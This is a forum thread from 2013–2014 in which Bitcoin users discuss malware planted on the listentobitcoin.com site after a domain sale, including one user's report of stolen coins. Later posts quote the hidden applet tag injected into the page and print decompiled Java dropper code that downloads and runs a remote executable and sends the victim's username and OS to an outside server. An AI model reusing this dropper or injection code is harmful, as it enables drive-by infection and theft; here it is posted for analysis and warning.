Title: Got this risk message, can someone elaborate on the listentobitcoin malware?
Post by: coastermonger on August 11, 2013, 07:52:39 PM
FIRST PRIORITY, DO NOT GO TO LISTEN TO BITCOIN . COMSaw this message come up from one of my AV recently. https://i.imgur.com/Vi14xrE.png along with a reddit post from the creator, apologizing for what happened to the site: http://www.reddit.com/r/Bitcoin/comments/1ia7q2/listen_to_bitcoin_contains_malware/cb2kpqb Can anyone elaborate on what kind of malware exists or existed at this site? I was browsing with chrome and unfortunately hadn't seen the post yet. I visited listentobitcoin, but chrome didn't bring up any warning and I wasn't asked to install anything. I'm curious what steps I need to talk to make sure that my computer is clear
Title: Re: Got this risk message, can someone elaborate on the listentobitcoin malware?
Post by: alp on August 11, 2013, 08:55:23 PM
Make sure it's clear? Reformat.
Title: Re: Got this risk message, can someone elaborate on the listentobitcoin malware?
Post by: SlickTheNick on August 11, 2013, 09:20:30 PM
Hint: for the most part, Anti Virus software is mostly snake oil. especially Mcafee, Norton etc.
Title: Re: Got this risk message, can someone elaborate on the listentobitcoin malware?
Post by: DiamondCardz on August 11, 2013, 09:33:44 PM
listentobitcoin was sold ages ago and malware was installed. Old news.
The official site is now http://www.bitlisten.com/
It's some kind of malware, it is dangerous. You could lose bitcoin, I'd clear your computer. Scan with MalwareBytes.
Title: Re: Got this risk message, can someone elaborate on the listentobitcoin malware?
Post by: Nagle on December 02, 2013, 10:42:19 PM
listentobitcoin was sold ages ago and malware was installed. Old news.
The official site is now http://www.bitlisten.com/
It's some kind of malware, it is dangerous. You could lose bitcoin, I'd clear your computer. Scan with MalwareBytes.
None of the major analysis tools find malware on "listentobitcoin.com". Comodo: http://app.webinspector.com/public/reports/18708129 Google: http://www.google.com/safebrowsing/diagnostic?site=listentobitcoin.com This sounds like a scam to get people to switch to "bitlisten.com"
Title: Re: Got this risk message, can someone elaborate on the listentobitcoin malware?
Post by: Remember remember the 5th of November on December 03, 2013, 05:08:56 AM
listentobitcoin was sold ages ago and malware was installed. Old news.
The official site is now http://www.bitlisten.com/
It's some kind of malware, it is dangerous. You could lose bitcoin, I'd clear your computer. Scan with MalwareBytes.
None of the major analysis tools find malware on "listentobitcoin.com". Comodo: http://app.webinspector.com/public/reports/18708129 Google: http://www.google.com/safebrowsing/diagnostic?site=listentobitcoin.com This sounds like a scam to get people to switch to "bitlisten.com" Look at the date of the thread, please!
Title: Re: Got this risk message, can someone elaborate on the listentobitcoin malware?
Post by: DiamondCardz on December 03, 2013, 06:46:48 PM
listentobitcoin was sold ages ago and malware was installed. Old news.
The official site is now http://www.bitlisten.com/
It's some kind of malware, it is dangerous. You could lose bitcoin, I'd clear your computer. Scan with MalwareBytes.
None of the major analysis tools find malware on "listentobitcoin.com". Comodo: http://app.webinspector.com/public/reports/18708129 Google: http://www.google.com/safebrowsing/diagnostic?site=listentobitcoin.com This sounds like a scam to get people to switch to "bitlisten.com" First, nice gravedig. Second, you're a retard. Third, you probably haven't even went on the fucking site yourself and I sure as hell won't. Maybe it's changed in 2 MONTHS, maybe not, I don't care to find out. Finally, http://www.reddit.com/r/Bitcoin/comments/1ia7q2/listen_to_bitcoin_contains_malware/cb2kpqb Please get your facts together before you try to spread FUD about something you know nothing about. Thanks.
Title: Re: Got this risk message, can someone elaborate on the listentobitcoin malware?
Post by: Nagle on December 05, 2013, 04:02:04 AM
Third, you probably haven't even went on the fucking site yourself and I sure as hell won't. Maybe it's changed in 2 MONTHS, maybe not, I don't care to find out.
I've been looking at the code on both sites, and running the sites through various testers, and I'm not seeing any malware. But I think there's a bug in Firefox's playing of audio files which results in choppy audio. Both sites will produce choppy audio after they've been running for a while. Once this has happened, Firefox has to be restarted to fix the problem. This appears under both Windows 7 and Linux.
Title: Re: Got this risk message, can someone elaborate on the listentobitcoin malware?
Post by: DiamondCardz on December 05, 2013, 06:54:58 AM
Third, you probably haven't even went on the fucking site yourself and I sure as hell won't. Maybe it's changed in 2 MONTHS, maybe not, I don't care to find out.
I've been looking at the code on both sites, and running the sites through various testers, and I'm not seeing any malware. Interesting. I don't know how the domain might have been re-acquired, but it was throwing up malware.
Title: Re: Got this risk message, can someone elaborate on the listentobitcoin malware?
Post by: devthedev on December 09, 2013, 02:39:38 PM
I said this below, but I want it to be a part of this post as well: I realize now that I made a very foolish mistake by selling the domain to someone untrustworthy, and I want to personally apologize to everyone who has been affected. I was too trusting, I made a huge mistake, and for what my words are worth, I promise that it won’t happen again.
~Maximillian Laumeister
http://bitcoinexaminer.org/listentobitcoin-com-was-infected-by-an-anonymous-buyer-says-founder-of-the-website/
Title: Re: Got this risk message, can someone elaborate on the listentobitcoin malware?
Post by: nfuse on January 05, 2014, 03:14:51 AM
well for me it was to late i lost 0.47 btc and 15 ltc today because of this shit about 23 december i visited listentobitcoin.com and today i found out my cryptsy.com account was emptyed.
after searching i found in the java logs the answer that say's it all
�] �ª �C�! H �Ch9àÖ �B �C Ø× �C Ø× %http://listentobitcoin.info/sezam.exe �188.165.49.114 � �<null> �HTTP/1.1 200 OK �content-length �502272
last-modified �Fri, 20 Dec 2013 17:50:53 GMT �expires �Mon, 06 Jan 2014 15:44:16 GMT �content-type �application/octet-stream �date �Mon, 23 Dec 2013 15:44:16 GMT �server �nginx
cache-control �max-age=1209600
sezam.exe create's a directory called /directory/cybergate/googleupdate.exe what allowed the hacker (lowlife scum) to access my laptop when i was away
i hopefully learned my lesson and using 2FA for now now i just need something to put back on my account :-[
if you thief have a change of heart and want to sleep better @ night please return my btc to 192ou1R5P3MQNtFoYDh1SuEDjcbGMJYZtk
Title: Re: Got this risk message, can someone elaborate on the listentobitcoin malware?
Post by: Nagle on January 05, 2014, 08:03:07 AM
The malware seems to be back. At the end of "www.listentobitcoin.com" is this code: <applet name="JavaUpdate" code="Client.class" archive="http://secure-jar.com/PLFG/Java.jar" width="0" height="0">
<param name="us" value="javasan.exe">
<param name="ca" value="http://ge.tt/api/1/files/4mRU7fB1/0/blob?download">
<param name="uk" value="http://www.listentobitcoin.com">
<param name="nl" value="fox33">
</applet>
This is appended to the end of the page, outside the </html> tag. This looks like something a break-in attack appended automatically and blindly.
Title: Re: Got this risk message, can someone elaborate on the listentobitcoin malware?
Post by: daviducsb on January 06, 2014, 10:22:28 AM
Are Apple computers susceptible to the malware on listentobitcoins or only PCs? If one visited the site on an Apple is one at risk?
Title: Re: Got this risk message, can someone elaborate on the listentobitcoin malware?
Post by: daviducsb on January 06, 2014, 05:55:14 PM
Hello... Anybody... Is it a threat to Apple Macs?
thx
Title: Re: Got this risk message, can someone elaborate on the listentobitcoin malware?
Post by: someguy123 on January 18, 2014, 08:06:04 PM
I decompiled their java file and it seems to be some kind-of download script. Here's malwarebytes post about it : http://blog.malwarebytes.org/fraud-scam/2014/01/musical-bitcoin-bubbles-serve-java-applets-malware/ Here's the source code decompiled for any security people import java.applet.Applet;
import java.applet.AppletContext;
import java.io.FileOutputStream;
import java.io.InputStream;
import java.net.URL;
import java.net.URLConnection;
public class SecureJAR extends Applet
{
public void init()
{
String str1 = System.getProperty("user.name");
String str2 = System.getProperty("os.name");
String str3 = System.getenv("temp");
String str4 = "\\";
String str5 = getParameter("rgsicvnjbn");
String str6 = str4.concat(str5);
String str7 = str3.concat(str6);
Object localObject = getParameter("ioqujbjsyq");
String str8 = "&yuvcpearce=";
String str9 = getParameter("ivmbhojyjv");
try
{
str2 = str2.replace(" ", "%20");
str1 = str1.replace(" ", "%20");
FileOutputStream localFileOutputStream = new FileOutputStream(str7);
Runtime localRuntime = Runtime.getRuntime();
URL localURL1 = new URL(getParameter("xmxdnhwphy"));
URLConnection localURLConnection = localURL1.openConnection();
InputStream localInputStream = localURLConnection.getInputStream();
byte[] arrayOfByte = new byte[1024];
int i;
while ((i = localInputStream.read(arrayOfByte, 0, arrayOfByte.length)) != -1)
localFileOutputStream.write(arrayOfByte, 0, i);
localInputStream.close();
localFileOutputStream.close();
localRuntime.exec(str7);
localObject = new URL((String)localObject);
getAppletContext().showDocument((URL)localObject);
URL localURL2 = new URL("http://epickit.net/qsxnonlvrc.php?username=" + str9 + str8.replace("yuvcpearce", "evyaipgncs") + str2 + str8.replace("yuvcpearce", "piyhnvzbpw") + str1 + str8.replace("yuvcpearce", "tlbkqdpvxm") + "Traditional");
localURL2.openStream();
}
catch (Exception localException)
{
}
}
}
Title: Re: Got this risk message, can someone elaborate on the listentobitcoin malware?
Post by: someguy123 on January 18, 2014, 08:16:19 PM
Hello... Anybody... Is it a threat to Apple Macs?
thx
The virus appears to download an EXE payload. Whether or not it has alternative payloads for Mac or Linux is unknown, but if you've visited the site and allowed the JAR to run, you may want to run some form of mac security program, as it's now detected by a good amount of antivirus programs.
|
